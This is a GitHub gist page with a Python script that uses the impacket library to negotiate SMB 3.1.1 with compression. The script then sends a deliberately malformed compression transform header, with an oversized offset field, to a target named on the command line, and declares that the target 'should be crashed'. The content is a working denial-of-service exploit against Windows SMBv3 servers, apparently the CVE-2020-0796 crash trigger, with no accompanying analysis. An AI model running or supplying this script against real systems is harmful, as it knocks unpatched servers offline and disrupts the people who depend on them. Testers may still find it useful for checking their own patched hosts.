Last active
May 28, 2020 10:28
-
-
Save asolino/45095268f0893bcf08bca3ae68a755b2 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
import argparse | |
import string | |
import sys | |
from impacket import nmb | |
from impacket.smb3 import SMB2_COMPRESSION_TRANSFORM_HEADER, SMB3, SMB2_DIALECT_311, SMB2_NEGOTIATE_SIGNING_REQUIRED, \ | |
SMB2_NEGOTIATE_SIGNING_ENABLED, STATUS_SUCCESS, SMB2_DIALECT_30, \ | |
SMB2_GLOBAL_CAP_ENCRYPTION, SMB2_DIALECT_WILDCARD, SMB2Negotiate_Response, SMB2_NEGOTIATE, \ | |
SMB2Negotiate, SMB311ContextData, SMB2NegotiateContext, SMB2_PREAUTH_INTEGRITY_CAPABILITIES, \ | |
SMB2PreAuthIntegrityCapabilities, \ | |
SMB2_DIALECT_002, SMB2_DIALECT_21, SMB2_GLOBAL_CAP_LEASING, SMB2_GLOBAL_CAP_LARGE_MTU, SMB3Packet, \ | |
SMB2_GLOBAL_CAP_DIRECTORY_LEASING, \ | |
SMB2_GLOBAL_CAP_MULTI_CHANNEL, SMB2_GLOBAL_CAP_PERSISTENT_HANDLES, rand, SMB2_COMPRESSION_CAPABILITIES, \ | |
SMB2CompressionCapabilities | |
class MySMB3(SMB3): | |
def __init__(self, remote_name, remote_host, my_name=None, host_type=nmb.TYPE_SERVER, sess_port=445, timeout=60, | |
UDP=0, preferredDialect=None, session=None, negSessionResponse=None): | |
SMB3.__init__(self,remote_name, remote_host, my_name, host_type, sess_port, timeout, UDP, SMB2_DIALECT_311, | |
session, negSessionResponse) | |
def negotiateSession(self, preferredDialect = None, negSessionResponse = None): | |
# Let's store some data for later use | |
self._Connection['ClientSecurityMode'] = SMB2_NEGOTIATE_SIGNING_ENABLED | |
if self.RequireMessageSigning is True: | |
self._Connection['ClientSecurityMode'] |= SMB2_NEGOTIATE_SIGNING_REQUIRED | |
self._Connection['Capabilities'] = SMB2_GLOBAL_CAP_ENCRYPTION | |
currentDialect = SMB2_DIALECT_WILDCARD | |
# Do we have a negSessionPacket already? | |
if negSessionResponse is not None: | |
# Yes, let's store the dialect answered back | |
negResp = SMB2Negotiate_Response(negSessionResponse['Data']) | |
currentDialect = negResp['DialectRevision'] | |
if currentDialect == SMB2_DIALECT_WILDCARD: | |
# Still don't know the chosen dialect, let's send our options | |
packet = self.SMB_PACKET() | |
packet['Command'] = SMB2_NEGOTIATE | |
negSession = SMB2Negotiate() | |
negSession['SecurityMode'] = self._Connection['ClientSecurityMode'] | |
negSession['Capabilities'] = self._Connection['Capabilities'] | |
negSession['ClientGuid'] = self.ClientGuid | |
if preferredDialect is not None: | |
negSession['Dialects'] = [preferredDialect] | |
if preferredDialect == SMB2_DIALECT_311: | |
# Build the Contexts | |
contextData = SMB311ContextData() | |
contextData['NegotiateContextOffset'] = 64+38+2 | |
contextData['NegotiateContextCount'] = 0 | |
# Add an SMB2_NEGOTIATE_CONTEXT with ContextType as SMB2_PREAUTH_INTEGRITY_CAPABILITIES | |
# to the negotiate request as specified in section 2.2.3.1: | |
negotiateContext = SMB2NegotiateContext() | |
negotiateContext['ContextType'] = SMB2_PREAUTH_INTEGRITY_CAPABILITIES | |
preAuthIntegrityCapabilities = SMB2PreAuthIntegrityCapabilities() | |
preAuthIntegrityCapabilities['HashAlgorithmCount'] = 1 | |
preAuthIntegrityCapabilities['SaltLength'] = 32 | |
preAuthIntegrityCapabilities['HashAlgorithms'] = b'\x01\x00' | |
preAuthIntegrityCapabilities['Salt'] = ''.join([rand.choice(string.ascii_letters) for _ in | |
range(preAuthIntegrityCapabilities['SaltLength'])]) | |
negotiateContext['Data'] = preAuthIntegrityCapabilities.getData() | |
negotiateContext['DataLength'] = len(negotiateContext['Data']) | |
contextData['NegotiateContextCount'] += 1 | |
pad = b'\xFF' * (8 - (negotiateContext['DataLength'] % 8)) | |
negotiateContext2 = SMB2NegotiateContext () | |
negotiateContext2['ContextType'] = SMB2_COMPRESSION_CAPABILITIES | |
compressionCapabilities = SMB2CompressionCapabilities() | |
compressionCapabilities['CompressionAlgorithmCount'] = 1 | |
compressionCapabilities['Padding'] = 0 | |
compressionCapabilities['Flags'] = 0 | |
compressionCapabilities['CompressionAlgorithms'] = b'\x01\x00' | |
negotiateContext2['Data'] = compressionCapabilities.getData() | |
negotiateContext2['DataLength'] = len(negotiateContext2['Data']) | |
contextData['NegotiateContextCount'] += 1 | |
negSession['ClientStartTime'] = contextData.getData() | |
negSession['Padding'] = b'\xFF\xFF' | |
# Subsequent negotiate contexts MUST appear at the first 8-byte aligned offset following the | |
# previous negotiate context. | |
negSession['NegotiateContextList'] = negotiateContext.getData() + pad + negotiateContext2.getData() | |
else: | |
negSession['Dialects'] = [SMB2_DIALECT_002, SMB2_DIALECT_21, SMB2_DIALECT_30] | |
negSession['DialectCount'] = len(negSession['Dialects']) | |
packet['Data'] = negSession | |
packetID = self.sendSMB(packet) | |
ans = self.recvSMB(packetID) | |
if ans.isValidAnswer(STATUS_SUCCESS): | |
negResp = SMB2Negotiate_Response(ans['Data']) | |
self._Connection['MaxTransactSize'] = min(0x100000,negResp['MaxTransactSize']) | |
self._Connection['MaxReadSize'] = min(0x100000,negResp['MaxReadSize']) | |
self._Connection['MaxWriteSize'] = min(0x100000,negResp['MaxWriteSize']) | |
self._Connection['ServerGuid'] = negResp['ServerGuid'] | |
self._Connection['GSSNegotiateToken'] = negResp['Buffer'] | |
self._Connection['Dialect'] = negResp['DialectRevision'] | |
if (negResp['SecurityMode'] & SMB2_NEGOTIATE_SIGNING_REQUIRED) == SMB2_NEGOTIATE_SIGNING_REQUIRED or \ | |
self._Connection['Dialect'] == SMB2_DIALECT_311: | |
self._Connection['RequireSigning'] = True | |
if self._Connection['Dialect'] == SMB2_DIALECT_311: | |
# Always Sign | |
self._Connection['RequireSigning'] = True | |
if (negResp['Capabilities'] & SMB2_GLOBAL_CAP_LEASING) == SMB2_GLOBAL_CAP_LEASING: | |
self._Connection['SupportsFileLeasing'] = True | |
if (negResp['Capabilities'] & SMB2_GLOBAL_CAP_LARGE_MTU) == SMB2_GLOBAL_CAP_LARGE_MTU: | |
self._Connection['SupportsMultiCredit'] = True | |
if self._Connection['Dialect'] >= SMB2_DIALECT_30: | |
# Switching to the right packet format | |
self.SMB_PACKET = SMB3Packet | |
if (negResp['Capabilities'] & SMB2_GLOBAL_CAP_DIRECTORY_LEASING) == SMB2_GLOBAL_CAP_DIRECTORY_LEASING: | |
self._Connection['SupportsDirectoryLeasing'] = True | |
if (negResp['Capabilities'] & SMB2_GLOBAL_CAP_MULTI_CHANNEL) == SMB2_GLOBAL_CAP_MULTI_CHANNEL: | |
self._Connection['SupportsMultiChannel'] = True | |
if (negResp['Capabilities'] & SMB2_GLOBAL_CAP_PERSISTENT_HANDLES) == SMB2_GLOBAL_CAP_PERSISTENT_HANDLES: | |
self._Connection['SupportsPersistentHandles'] = True | |
if (negResp['Capabilities'] & SMB2_GLOBAL_CAP_ENCRYPTION) == SMB2_GLOBAL_CAP_ENCRYPTION: | |
self._Connection['SupportsEncryption'] = True | |
self._Connection['ServerCapabilities'] = negResp['Capabilities'] | |
self._Connection['ServerSecurityMode'] = negResp['SecurityMode'] | |
def attack(self): | |
compressedHeader = SMB2_COMPRESSION_TRANSFORM_HEADER () | |
compressedHeader['ProtocolID'] = 0x424D53FC | |
compressedHeader['OriginalCompressedSegmentSize'] = 1024 | |
compressedHeader['CompressionAlgorithm'] = 1 | |
compressedHeader['Flags'] = 0xffff | |
compressedHeader['Offset_Length'] = 0xffffffff | |
self._NetBIOSSession.send_packet (compressedHeader.getData () + b"A" * 1024) | |
if __name__ == '__main__': | |
parser = argparse.ArgumentParser() | |
parser.add_argument('target', action='store', help='<targetName or address>') | |
if len(sys.argv)==1: | |
parser.print_help() | |
sys.exit(1) | |
options = parser.parse_args() | |
print('Sending attack') | |
sess = MySMB3(options.target, options.target) | |
sess.attack() | |
print('Done. Target should be crashed') | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment